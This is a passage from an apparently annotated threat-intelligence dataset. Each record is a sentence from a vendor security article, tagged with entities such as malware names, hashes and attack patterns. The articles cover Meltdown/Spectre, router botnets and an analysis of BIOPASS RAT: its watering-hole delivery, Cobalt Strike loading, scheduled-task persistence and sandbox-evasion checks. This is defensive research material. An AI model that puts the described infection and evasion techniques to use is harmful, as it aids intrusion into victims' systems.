vulnerable.","entities":[],"relations":[],"Comments":[]} {"id":3097,"text":" Because these vulnerabilities affect the processors at the physical layer, the only way for the vulnerabilities to be fully addressed is for the processors to be replaced or to have a firmware update.","entities":[],"relations":[],"Comments":[]} {"id":3098,"text":" Until then, the makers of operating systems can (and have) released patches that make the physical-layer vulnerabilities inaccessible.","entities":[],"relations":[],"Comments":[]} {"id":3099,"text":"For all intents and purposes, it “patches” the vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3100,"text":" Full technical details on the vulnerabilities are available at the sites referenced above.","entities":[],"relations":[],"Comments":[]} {"id":3101,"text":"But the key point to understand about these vulnerabilities is that they are information disclosure vulnerabilities that can enable processes and applications to access information they otherwise shouldn’t be able to: user-mode applications can access privileged information in the kernel and throughout the operating system.","entities":[],"relations":[],"Comments":[]} {"id":3102,"text":" For regular end-user systems and devices, malware and malicious scripts can use these vulnerabilities to access information like usernames, passwords and account information.","entities":[],"relations":[],"Comments":[]} {"id":3103,"text":" For shared-hosting environments like public cloud providers, this means that one hosted customer could potentially access the information of any other customer hosted on the same hardware.","entities":[],"relations":[],"Comments":[]} {"id":3104,"text":" Based on analysis of the vulnerabilities, an industry consensus is emerging that generic protections against attacks aimed at these vulnerabilities will be difficult, if not impossible to develop.","entities":[],"relations":[],"Comments":[]} {"id":3105,"text":"This means that prevention against attacks will have to focus on specific malware, attacks, and hosting sites as they emerge.","entities":[],"relations":[],"Comments":[]} {"id":3106,"text":" Risk Assessment","entities":[],"relations":[],"Comments":[]} {"id":3107,"text":" Because these are information disclosure vulnerabilities, they don’t pose the same, immediate danger like WannaCry\/WanaCrypt0r or Petya\/NotPetya.","entities":[{"id":9496,"label":"malware","start_offset":137,"end_offset":145},{"id":9493,"label":"malware","start_offset":107,"end_offset":115},{"id":9494,"label":"malware","start_offset":116,"end_offset":127},{"id":9495,"label":"malware","start_offset":131,"end_offset":136}],"relations":[],"Comments":[]} {"id":3108,"text":"This has more in common with the Heartbleed event of 2014.","entities":[{"id":48254,"label":"vulnerability","start_offset":33,"end_offset":43},{"id":48255,"label":"TIME","start_offset":53,"end_offset":57}],"relations":[],"Comments":[]} {"id":3109,"text":" In terms of the severity of the vulnerabilities themselves: they are important, but not critical.","entities":[],"relations":[],"Comments":[]} {"id":3110,"text":"They are information disclosure, not code execution, vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":3111,"text":" The greatest area of risk is in shared-hosting scenarios.","entities":[],"relations":[],"Comments":[]} {"id":3112,"text":"Fortunately, most cloud providers have already deployed security updates and those that haven’t are expected to do so shortly.","entities":[],"relations":[],"Comments":[]} {"id":3113,"text":" For end-users and those managing networks, the greatest risk these vulnerabilities pose is exploitation by malware seeking to gather information like usernames and passwords from systems. What makes these vulnerabilities most notable from a risk assessment point of view is breadth of exposure.","entities":[],"relations":[],"Comments":[]} {"id":3114,"text":"Since these potentially affect nearly every device with a modern processor, that means that full mitigation and remediation may not be possible.","entities":[],"relations":[],"Comments":[]} {"id":3115,"text":"Older systems (like Windows XP) and devices (like older Android smartphones and IoT devices) will likely never receive fixes for these vulnerabilities.","entities":[{"id":48257,"label":"SOFTWARE","start_offset":56,"end_offset":63},{"id":48256,"label":"SOFTWARE","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} {"id":3116,"text":"Calls to Action ","entities":[],"relations":[],"Comments":[]} {"id":3117,"text":"The actions to take in response to this event are clear and simple: As always, we will continue to watch this event closely and provide any updates that we can.","entities":[],"relations":[],"Comments":[]} {"id":3118,"text":" For information on how Palo Alto Networks products are affected by these issues, customers can see our posting on the Live Community at: https:\/\/live.paloaltonetworks.com\/t5\/Customer-Advisories\/Information-about-Meltdown-and-Spectre-findings\/ta-p\/193878\/jump-to\/first-unread-message.","entities":[{"id":48258,"label":"identity","start_offset":24,"end_offset":42},{"id":9530,"label":"URL","start_offset":138,"end_offset":283}],"relations":[],"Comments":[]} {"id":3119,"text":" If you have any questions, please visit the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} {"id":3120,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":3121,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3122,"text":"In recent research, Palo Alto Networks found attackers were targeting home routers to take control and use them for attacks against other websites that can bring them down.","entities":[{"id":48259,"label":"identity","start_offset":20,"end_offset":38}],"relations":[],"Comments":[]} {"id":3123,"text":"Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} {"id":3124,"text":" Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} {"id":3125,"text":"These attacks could affect you in two ways: What causes this kind of attack?","entities":[],"relations":[],"Comments":[]} {"id":3126,"text":"Weak passwords and out-of-date software can both enable attackers to take complete control of your home router.","entities":[{"id":48260,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":48261,"label":"attack-pattern","start_offset":19,"end_offset":39}],"relations":[],"Comments":[]} {"id":3127,"text":" How can I prevent it?","entities":[],"relations":[],"Comments":[]} {"id":3128,"text":"Attackers target home routers like this by targeting default passwords and out-of-date software on the routers.","entities":[{"id":48262,"label":"attack-pattern","start_offset":53,"end_offset":70},{"id":48263,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} {"id":3129,"text":"An easy thing you can do is restart your router once a week (typically by unplugging it).","entities":[],"relations":[],"Comments":[]} {"id":3130,"text":"You can also stay safe by changing the password on your router and updating the software.","entities":[],"relations":[],"Comments":[]} {"id":3131,"text":"If you’re not sure how to do this, contact your Internet Service Provider (ISP) that gave you the router for help.","entities":[],"relations":[],"Comments":[]} {"id":3132,"text":" How does it work?","entities":[],"relations":[],"Comments":[]} {"id":3133,"text":"When devices (in this case, the routers) are under someone else’s control like this, the collection is referred to as a “botnet”, a network (-net) of remotely controlled systems or devices (bot-).","entities":[],"relations":[],"Comments":[]} {"id":3134,"text":"When attackers have complete control of your home router, they can install attack software that they control, turning the device into a “bot”.","entities":[],"relations":[],"Comments":[]} {"id":3135,"text":"Attacks can make all the controlled routers in a botnet do anything they want, including sending huge amounts of data to try and bring websites down.","entities":[],"relations":[],"Comments":[]} {"id":3136,"text":"These kinds of attacks are called “Distributed Denial of Service” or “DDoS” attacks.","entities":[{"id":48264,"label":"attack-pattern","start_offset":35,"end_offset":64},{"id":48265,"label":"attack-pattern","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} {"id":3137,"text":"Attackers use them to take down websites for several reasons: About Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} {"id":3138,"text":"They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":48266,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} {"id":3139,"text":"Got a topic you want us to write about for you, your friends, or your family?","entities":[],"relations":[],"Comments":[]} {"id":3140,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":9584,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} {"id":3141,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":3142,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3143,"text":"There’s a very good reason why AWS remains a leader in cloud computing.","entities":[],"relations":[],"Comments":[]} {"id":3144,"text":"While many providers describe themselves as “customer obsessed,” few come close to our long-time partner in the lengths it goes to earn and retain the trust of its customers.","entities":[],"relations":[],"Comments":[]} {"id":3145,"text":"AWS starts with the customer and works backwards.","entities":[{"id":48267,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":3146,"text":"That means the vast majority of its feature enhancements and new services are directly driven from their input.","entities":[],"relations":[],"Comments":[]} {"id":3147,"text":"The latest is Amazon GuardDuty Malware Protection.","entities":[{"id":48268,"label":"SOFTWARE","start_offset":14,"end_offset":49}],"relations":[],"Comments":[]} {"id":3148,"text":"This threat detection tool, which will work closely with Trend Micro cloud solutions, will provide another valuable layer of defense in our fight against a shared adversary.","entities":[{"id":48269,"label":"SOFTWARE","start_offset":57,"end_offset":84}],"relations":[],"Comments":[]} {"id":3149,"text":"Shining a light on an expanding attack surface Spurred by a drive for greater cost efficiency and business agility, global organizations are migrating to the cloud in droves.","entities":[],"relations":[],"Comments":[]} {"id":3150,"text":"Gartner predicts the worldwide market for public cloud services will reach almost $495bn this year, and grow by over 21% in 2023.","entities":[{"id":48271,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":3151,"text":"In this environment, security remains a persistent concern for cloud builders, because if not properly managed, investments can increase the digital attack surface.","entities":[],"relations":[],"Comments":[]} {"id":3152,"text":"According to recent Trend Micro research, many global organizations are already struggling to securely manage their cloud assets.","entities":[{"id":48270,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} {"id":3153,"text":"We found that 73% of IT and business leaders are concerned with the size of their attack surface, and 43% claim it is “spiralling out of control.”","entities":[],"relations":[],"Comments":[]} {"id":3154,"text":"Cloud is the area where most respondents say they have least insight.","entities":[],"relations":[],"Comments":[]} {"id":3155,"text":"They want their cloud providers to do more—for example by building enhanced detection into their systems, to complement third-party tools.","entities":[],"relations":[],"Comments":[]} {"id":3156,"text":"That’s part of the reason why AWS built Amazon GuardDuty Malware Protection was built.","entities":[{"id":48273,"label":"SOFTWARE","start_offset":40,"end_offset":75},{"id":48272,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} {"id":3157,"text":"This new feature is triggered by detection of known malicious signatures across the cloud network.","entities":[],"relations":[],"Comments":[]} {"id":3158,"text":"Based on this detection, the service scans the associated Amazon EBS storage environment for malware and reports any findings to AWS Security Hub.","entities":[{"id":48274,"label":"SOFTWARE","start_offset":58,"end_offset":88},{"id":48275,"label":"SOFTWARE","start_offset":129,"end_offset":145}],"relations":[],"Comments":[]} {"id":3159,"text":"Open APIs from here link to products like Trend Micro Cloud One to enhance existing detection and response efforts.","entities":[{"id":48276,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":48277,"label":"SOFTWARE","start_offset":42,"end_offset":63}],"relations":[],"Comments":[]} {"id":3160,"text":"Better together Trend Micro and AWS have been working closely together for over a decade now, and this latest announcement represents another exciting stage in the journey.","entities":[{"id":48278,"label":"identity","start_offset":16,"end_offset":27},{"id":48279,"label":"identity","start_offset":32,"end_offset":35}],"relations":[],"Comments":[]} {"id":3161,"text":"Customers will welcome AWS native threat detection as a complement to their Trend Micro Cloud One capabilities, delivering a comprehensive range of features to secure the hybrid cloud.","entities":[{"id":48280,"label":"identity","start_offset":23,"end_offset":26},{"id":48281,"label":"SOFTWARE","start_offset":76,"end_offset":97}],"relations":[],"Comments":[]} {"id":3162,"text":"Once they add the AWS tool to our virtual patching, vulnerability scanning, lateral movement detection, posture management and other capabilities, joint customers will have a powerful set of integrated offerings to deliver simple, all-in-one cloud security and compliance.","entities":[{"id":48282,"label":"SOFTWARE","start_offset":18,"end_offset":26}],"relations":[],"Comments":[]} {"id":3163,"text":"In addition, this move from AWS validates our XDR strategy, which is focused on using as many data sources as possible to enhance detection and response.","entities":[{"id":48283,"label":"identity","start_offset":28,"end_offset":31}],"relations":[],"Comments":[]} {"id":3164,"text":"The bottom line is that security takes a village.","entities":[],"relations":[],"Comments":[]} {"id":3165,"text":"Customers, cloud providers and security vendors have a shared responsibility to work together as the threat landscape continues to evolve.","entities":[],"relations":[],"Comments":[]} {"id":3166,"text":"That’s what we’ll continue to do, expanding and deepening our strategic partnerships with AWS and other providers in a collective effort to make the digital world safer.","entities":[{"id":48284,"label":"identity","start_offset":90,"end_offset":93}],"relations":[],"Comments":[]} {"id":3167,"text":" Tags Cloud | Latest News | Malware | APT & Targeted Attacks |","entities":[],"relations":[],"Comments":[]} {"id":3168,"text":"Compliance & Risks | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":3169,"text":"We discovered a new malware that targets online gambling companies in China via a watering hole attack, in which visitors are tricked into downloading a malware loader disguised as a legitimate installer for well-known apps such as Adobe Flash Player or Microsoft Silverlight.","entities":[{"id":48286,"label":"attack-pattern","start_offset":82,"end_offset":102},{"id":48287,"label":"attack-pattern","start_offset":126,"end_offset":150},{"id":48291,"label":"malware","start_offset":16,"end_offset":27},{"id":48285,"label":"location","start_offset":70,"end_offset":75},{"id":48289,"label":"SOFTWARE","start_offset":254,"end_offset":275},{"id":48290,"label":"identity","start_offset":41,"end_offset":66},{"id":48288,"label":"SOFTWARE","start_offset":232,"end_offset":250}],"relations":[{"id":396,"from_id":48291,"to_id":48290,"type":"targets"},{"id":397,"from_id":48290,"to_id":48285,"type":"located-at"},{"id":398,"from_id":48291,"to_id":48286,"type":"uses"},{"id":399,"from_id":48291,"to_id":48287,"type":"uses"}],"Comments":[]} {"id":3170,"text":"Closer examination of the loader shows that it loads either a Cobalt Strike shellcode or a previously undocumented backdoor written in Python, a new type of malware that we found to be named BIOPASS RAT (remote access trojan).","entities":[{"id":48293,"label":"tools","start_offset":62,"end_offset":75},{"id":48294,"label":"SOFTWARE","start_offset":135,"end_offset":141},{"id":48292,"label":"malware","start_offset":191,"end_offset":202}],"relations":[],"Comments":[]} {"id":3171,"text":"BIOPASS RAT possesses basic features found in other malware, such as file system assessment, remote desktop access, file exfiltration, and shell command execution.","entities":[{"id":48295,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3172,"text":"It also has the ability to compromise the private information of its victims by stealing web browser and instant messaging client data.","entities":[],"relations":[],"Comments":[]} {"id":3173,"text":"What makes BIOPASS RAT particularly interesting is that it can sniff its victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).","entities":[{"id":48296,"label":"malware","start_offset":11,"end_offset":22},{"id":48298,"label":"SOFTWARE","start_offset":258,"end_offset":293},{"id":48297,"label":"SOFTWARE","start_offset":117,"end_offset":148}],"relations":[{"id":400,"from_id":48296,"to_id":48297,"type":"targets"}],"Comments":[]} {"id":3174,"text":"In addition, the attack misuses the object storage service (OSS) of Alibaba Cloud (Aliyun) to host the BIOPASS RAT Python scripts as well as to store the exfiltrated data from victims.","entities":[{"id":48300,"label":"malware","start_offset":103,"end_offset":114},{"id":48299,"label":"Infrastucture","start_offset":68,"end_offset":90}],"relations":[{"id":401,"from_id":48299,"to_id":48300,"type":"hosts"}],"Comments":[]} {"id":3175,"text":" We consider BIOPASS RAT as still being actively developed.","entities":[{"id":48301,"label":"malware","start_offset":13,"end_offset":24}],"relations":[],"Comments":[]} {"id":3176,"text":"For example, some markers that we discovered during our analysis refer to different versions of RAT code, such as “V2” or “BPSV3”.","entities":[],"relations":[],"Comments":[]} {"id":3177,"text":"Many of the loaders that we found were used to load Cobalt Strike shellcode by default instead of the BIOPASS RAT malware.","entities":[{"id":48302,"label":"tools","start_offset":52,"end_offset":65},{"id":48303,"label":"malware","start_offset":102,"end_offset":113}],"relations":[],"Comments":[]} {"id":3178,"text":"Furthermore, BIOPASS RAT also creates scheduled tasks to load the Cobalt Strike shellcode during the initialization, indicating that the malicious actor behind the attack still heavily relies on Cobalt Strike.","entities":[{"id":48304,"label":"malware","start_offset":13,"end_offset":24},{"id":48305,"label":"tools","start_offset":66,"end_offset":79},{"id":48306,"label":"tools","start_offset":195,"end_offset":208}],"relations":[{"id":402,"from_id":48304,"to_id":48305,"type":"uses"}],"Comments":[]} {"id":3179,"text":" We also found several clues that show how the malware might be connected with the Winnti Group(also known as APT41). ","entities":[{"id":48308,"label":"threat-actor","start_offset":110,"end_offset":115},{"id":48307,"label":"threat-actor","start_offset":83,"end_offset":95}],"relations":[{"id":403,"from_id":48307,"to_id":48308,"type":"duplicate-of"}],"Comments":[]} {"id":3180,"text":"In this blog entry, we will dive deeper into BIOPASS RAT with a detailed technical analysis of the infection chain, the different components of the malware, and any possible associations with Winnti.","entities":[{"id":48309,"label":"threat-actor","start_offset":192,"end_offset":198},{"id":48310,"label":"malware","start_offset":45,"end_offset":56}],"relations":[{"id":404,"from_id":48310,"to_id":48309,"type":"related-to"}],"Comments":[]} {"id":3181,"text":" Infection chain ","entities":[],"relations":[],"Comments":[]} {"id":3182,"text":"The initial delivery mechanism of BIOPASS RAT uses of a watering hole, a compromised website in which the malicious actors inject their custom JavaScript code to deliver malware.","entities":[{"id":48312,"label":"attack-pattern","start_offset":56,"end_offset":69},{"id":48311,"label":"malware","start_offset":34,"end_offset":45}],"relations":[{"id":405,"from_id":48311,"to_id":48312,"type":"uses"}],"Comments":[]} {"id":3183,"text":"In most of the cases that we observed, the attackers usually place their injection script in their target’s online support chat page.","entities":[],"relations":[],"Comments":[]} {"id":3184,"text":" Figure 1. The login panel of BIOPASS RAT Figure 2. Code showing the watering hole attack injection The injected script will try to scan the affected host by sending HTTP requests to a list of ports.","entities":[{"id":48313,"label":"malware","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} {"id":3185,"text":"If it receives any response with an expected string from these ports, the script will stop.","entities":[],"relations":[],"Comments":[]} {"id":3186,"text":"This step is likely designed to avoid attacking an already infected victim.","entities":[],"relations":[],"Comments":[]} {"id":3187,"text":"We found that the BIOPASS RAT has the ability to open an HTTP service running on localhost on a port chosen from a hard-coded list.","entities":[{"id":48314,"label":"malware","start_offset":18,"end_offset":29}],"relations":[],"Comments":[]} {"id":3188,"text":"This functionality allows the script to identify whether the victim has already been infected by their malware.","entities":[],"relations":[],"Comments":[]} {"id":3189,"text":"It conducts this identification by testing whether the port is open or not and then by checking the response. Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":3190,"text":"The script used to check for existing BIOPASS RAT infections If the script confirms that the visitor has not yet been infected, it will then replace the original page content with the attackers’ own content.","entities":[{"id":48315,"label":"malware","start_offset":38,"end_offset":49}],"relations":[],"Comments":[]} {"id":3191,"text":"The new page will show an error message with an accompanying instruction telling website visitors to download either a Flash installer or a Silverlight installer, both of which are malicious loaders.","entities":[{"id":48317,"label":"SOFTWARE","start_offset":140,"end_offset":151},{"id":48316,"label":"SOFTWARE","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} {"id":3192,"text":"It is important to note that both Adobe Flash and Microsoft Silverlight have already been deprecated by their respective vendors.","entities":[{"id":48318,"label":"SOFTWARE","start_offset":34,"end_offset":45},{"id":48319,"label":"SOFTWARE","start_offset":50,"end_offset":71}],"relations":[],"Comments":[]} {"id":3193,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":3194,"text":"The fake Adobe Flash Player download page of the watering hole attack Figure 5.","entities":[{"id":48321,"label":"attack-pattern","start_offset":49,"end_offset":69},{"id":48320,"label":"SOFTWARE","start_offset":9,"end_offset":27}],"relations":[],"Comments":[]} {"id":3195,"text":"The fake Silverlight download page of the watering hole attack Figure 6.","entities":[{"id":48322,"label":"SOFTWARE","start_offset":9,"end_offset":20},{"id":48323,"label":"attack-pattern","start_offset":42,"end_offset":62}],"relations":[],"Comments":[]} {"id":3196,"text":"Anti-VM checks in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5 Figure 7.","entities":[{"id":9775,"label":"SHA2","start_offset":25,"end_offset":89}],"relations":[],"Comments":[]} {"id":3197,"text":"Check for zh-CN-preferred UI language in sample 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 ","entities":[{"id":9779,"label":"SHA2","start_offset":48,"end_offset":112}],"relations":[],"Comments":[]} {"id":3198,"text":"The legitimate known application is downloaded and executed.","entities":[],"relations":[],"Comments":[]} {"id":3199,"text":"Authenticode-signed files are either downloaded from the official websites (as seen in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5) or are hosted on Alibaba Cloud OSS on the attackers’ account.","entities":[{"id":48324,"label":"Infrastucture","start_offset":177,"end_offset":194},{"id":9783,"label":"SHA1","start_offset":94,"end_offset":158}],"relations":[{"id":406,"from_id":48324,"to_id":9783,"type":"hosts"}],"Comments":[]} {"id":3200,"text":"Visual C++ runtime, a legitimate and signed vc_redist.x??.exe, and Python runtime are then downloaded.","entities":[{"id":48325,"label":"FILEPATH","start_offset":44,"end_offset":61},{"id":48326,"label":"SOFTWARE","start_offset":0,"end_offset":18},{"id":48327,"label":"SOFTWARE","start_offset":67,"end_offset":81}],"relations":[],"Comments":[]} {"id":3201,"text":"These files are also hosted on Alibaba Cloud OSS on an attacker-controlled account.","entities":[{"id":48328,"label":"Infrastucture","start_offset":31,"end_offset":48}],"relations":[],"Comments":[]} {"id":3202,"text":"The Python runtime is usually a ZIP file with all required executables, as well as the DLL and Python libraries necessary for running Python scripts on machines where Python is not installed.","entities":[{"id":48329,"label":"SOFTWARE","start_offset":4,"end_offset":10},{"id":48330,"label":"SOFTWARE","start_offset":95,"end_offset":101},{"id":48331,"label":"SOFTWARE","start_offset":134,"end_offset":140},{"id":48332,"label":"SOFTWARE","start_offset":167,"end_offset":173}],"relations":[],"Comments":[]} {"id":3203,"text":"Scheduled tasks that are activated on a new login are created.","entities":[],"relations":[],"Comments":[]} {"id":3204,"text":"These tasks can run a BPS backdoor or a Cobalt Strike loader.","entities":[{"id":48334,"label":"tools","start_offset":40,"end_offset":53},{"id":48333,"label":"malware","start_offset":22,"end_offset":34}],"relations":[],"Comments":[]} {"id":3205,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3206,"text":"Code excerpt from the scheduled task We also noticed the path string “ServiceHub”, which is a path to the extracted Python runtime.","entities":[{"id":9799,"label":"attack-pattern","start_offset":22,"end_offset":36}],"relations":[],"Comments":[]} {"id":3207,"text":"After the hex decoding of the arguments, we get a Python one-liner that downloads additional Python scripts from the cloud.","entities":[{"id":48335,"label":"SOFTWARE","start_offset":50,"end_offset":56},{"id":48336,"label":"SOFTWARE","start_offset":93,"end_offset":100}],"relations":[],"Comments":[]} {"id":3208,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":3209,"text":"Python code for downloading additional components from Alibaba Cloud OSS Figure 10.","entities":[{"id":48337,"label":"Infrastucture","start_offset":55,"end_offset":72}],"relations":[],"Comments":[]} {"id":3210,"text":"The BIOPASS RAT infection flow ","entities":[{"id":9806,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} {"id":3211,"text":"Examining the BIOPASS RAT modules We observed a few scheduled tasks being created, with the number dependent on the analyzed sample.","entities":[{"id":9807,"label":"malware","start_offset":14,"end_offset":25}],"relations":[],"Comments":[]} {"id":3212,"text":"In the following section, we provide an analysis for each important backdoor module.","entities":[],"relations":[],"Comments":[]} {"id":3213,"text":"The cdaemon module One of the modules used is called “cdaemon”.","entities":[],"relations":[],"Comments":[]} {"id":3214,"text":"At the time of our research into this threat, only the “print(1)” command is able to be executed.","entities":[],"relations":[],"Comments":[]} {"id":3215,"text":"An old sample of the module (30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7) is likely a watchdog to check the status of another module that is known as “c1222”. The malicious actors can change this behavior by replacing the content of the cdaemon.txt service in the cloud so that when combined with the regular execution of the scheduled task, the cdaemon task can behave like a backdoor.","entities":[{"id":48338,"label":"malware","start_offset":172,"end_offset":177},{"id":48339,"label":"FILEPATH","start_offset":259,"end_offset":270},{"id":9814,"label":"SHA2","start_offset":29,"end_offset":93},{"id":9821,"label":"attack-pattern","start_offset":348,"end_offset":362}],"relations":[{"id":407,"from_id":9814,"to_id":48338,"type":"related-to"}],"Comments":[]} {"id":3216,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":3217,"text":"The content of the cdaemon.txt backdoor The c1222 module","entities":[{"id":48341,"label":"malware","start_offset":48,"end_offset":53},{"id":48340,"label":"FILEPATH","start_offset":19,"end_offset":30}],"relations":[],"Comments":[]} {"id":3218,"text":"The second scheduled task is called “c1222.txt,” which is a Python code run by a previously downloaded Python runtime.","entities":[{"id":48343,"label":"SOFTWARE","start_offset":60,"end_offset":66},{"id":48344,"label":"SOFTWARE","start_offset":103,"end_offset":109},{"id":48342,"label":"FILEPATH","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":3219,"text":"This code runs an HTTP server that listens on predefined ports.","entities":[],"relations":[],"Comments":[]} {"id":3220,"text":"If accessed by an HTTP client, it returns a marker value.","entities":[],"relations":[],"Comments":[]} {"id":3221,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":3222,"text":"The list of predefined ports to bind an HTTP service to, which is reversed After accessing the infected machine with an HTTP server bound to a predefined port","entities":[],"relations":[],"Comments":[]} {"id":3223,"text":", the module returns the marker value.","entities":[],"relations":[],"Comments":[]} {"id":3224,"text":" Figure 13.","entities":[],"relations":[],"Comments":[]} {"id":3225,"text":"The HTTP service with marker BPSV3 We also observed other markers — such as, “cs_online”, “online”, and “dm_online”.","entities":[],"relations":[],"Comments":[]} {"id":3226,"text":"The purpose of the HTTP service is to act as a marker for an infected machine to avoid repeated infection, as aforementioned in the infection chain section.","entities":[],"relations":[],"Comments":[]} {"id":3227,"text":"The most important task of the c1222 script is to download, decode, and execute the Cobalt Strike shellcode.","entities":[{"id":48346,"label":"malware","start_offset":31,"end_offset":36},{"id":48345,"label":"tools","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} {"id":3228,"text":"Based on the platform, it downloads a file with an encoded shellcode (sc3.txt, x64.txt), and then decodes it (the shellcode is base85 and hex-encoded). Figure 14. Decoding the Cobalt Strike shellcode The big module (BIOPASS RAT)","entities":[{"id":48347,"label":"FILEPATH","start_offset":70,"end_offset":77},{"id":48349,"label":"tools","start_offset":181,"end_offset":194},{"id":48348,"label":"FILEPATH","start_offset":79,"end_offset":86},{"id":9839,"label":"malware","start_offset":225,"end_offset":236}],"relations":[],"Comments":[]} {"id":3229,"text":"The third scheduled task —is called “big.txt”— is responsible for implementing the BIOPASS RAT malware.","entities":[{"id":48350,"label":"FILEPATH","start_offset":37,"end_offset":44},{"id":9841,"label":"attack-pattern","start_offset":10,"end_offset":24},{"id":9842,"label":"malware","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} {"id":3230,"text":"This is a Python-based backdoor that is distributed in plain text or compiled with Nuitka or PyArmor and PyInstaller.","entities":[{"id":48351,"label":"SOFTWARE","start_offset":83,"end_offset":89},{"id":48352,"label":"SOFTWARE","start_offset":93,"end_offset":100},{"id":48353,"label":"SOFTWARE","start_offset":105,"end_offset":116},{"id":48354,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} {"id":3231,"text":"When the malware starts, it checks whether the file with the hard-coded name “%PUBLIC%\/20200318” exists.","entities":[{"id":48355,"label":"FILEPATH","start_offset":78,"end_offset":95}],"relations":[],"Comments":[]} {"id":3232,"text":"This file is a marker to determine if the scheduled task of the backdoor has been installed.","entities":[],"relations":[],"Comments":[]} {"id":3233,"text":" If the file (that is, the marker) is not found, the backdoor creates a new one and writes the current timestamp onto it.","entities":[],"relations":[],"Comments":[]} {"id":3234,"text":"The malware will then delete the scheduled tasks added by the loader and add two new scheduled tasks that are listed in Table 1.","entities":[],"relations":[],"Comments":[]} {"id":3235,"text":"Task Name Behavior ServiceHub Executes Python with a parameter that is the Python script to download and execute Cobalt Strike loader script “c1222” module ShellExperienceHost Executes Python with a parameter that is the Python script to download and execute BIOPASS RAT script “big” module Table 1.","entities":[{"id":48356,"label":"malware","start_offset":146,"end_offset":151},{"id":48357,"label":"SOFTWARE","start_offset":79,"end_offset":85},{"id":48358,"label":"SOFTWARE","start_offset":43,"end_offset":49},{"id":48359,"label":"SOFTWARE","start_offset":227,"end_offset":233},{"id":48360,"label":"SOFTWARE","start_offset":191,"end_offset":197},{"id":9858,"label":"tools","start_offset":117,"end_offset":130},{"id":9860,"label":"malware","start_offset":265,"end_offset":276}],"relations":[],"Comments":[]} {"id":3236,"text":"The scheduled tasks created by BIOPASS RAT The BIOPASS RAT malware loads a Python script, “online.txt” that will open an HTTP server that listens on one of the following port numbers: 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, or 62880.","entities":[{"id":48362,"label":"FILEPATH","start_offset":93,"end_offset":103},{"id":48361,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":9862,"label":"malware","start_offset":31,"end_offset":42},{"id":9863,"label":"malware","start_offset":49,"end_offset":60}],"relations":[],"Comments":[]} {"id":3237,"text":"The HTTP server does nothing but returns string “BPSV3” to request.","entities":[],"relations":[],"Comments":[]} {"id":3238,"text":" A second HTTP server will also be created to listen on one of the aforementioned port numbers.","entities":[],"relations":[],"Comments":[]} {"id":3239,"text":"The second HTTP server behaves the same as the first but returns a string, “dm_online”, instead.","entities":[],"relations":[],"Comments":[]} {"id":3240,"text":"These are the markers of infection as previously mentioned.","entities":[],"relations":[],"Comments":[]} {"id":3241,"text":"After the servers are established and running, the backdoor creates an execution root directory in the folder “%PUBLIC%\/BPS\/V3\/”.","entities":[{"id":48363,"label":"FILEPATH","start_offset":111,"end_offset":127}],"relations":[],"Comments":[]} {"id":3242,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} {"id":3243,"text":"The script of a simple HTTP server to return string “dm_online” If the malware finds that the system username is “vbccsb”","entities":[],"relations":[],"Comments":[]} {"id":3244,"text":", it will stop.","entities":[],"relations":[],"Comments":[]} {"id":3245,"text":"It must be noted that “vbccsb” is the default username on ThreatBook Cloud Sandbox, a popular alternative to VirusTotal in 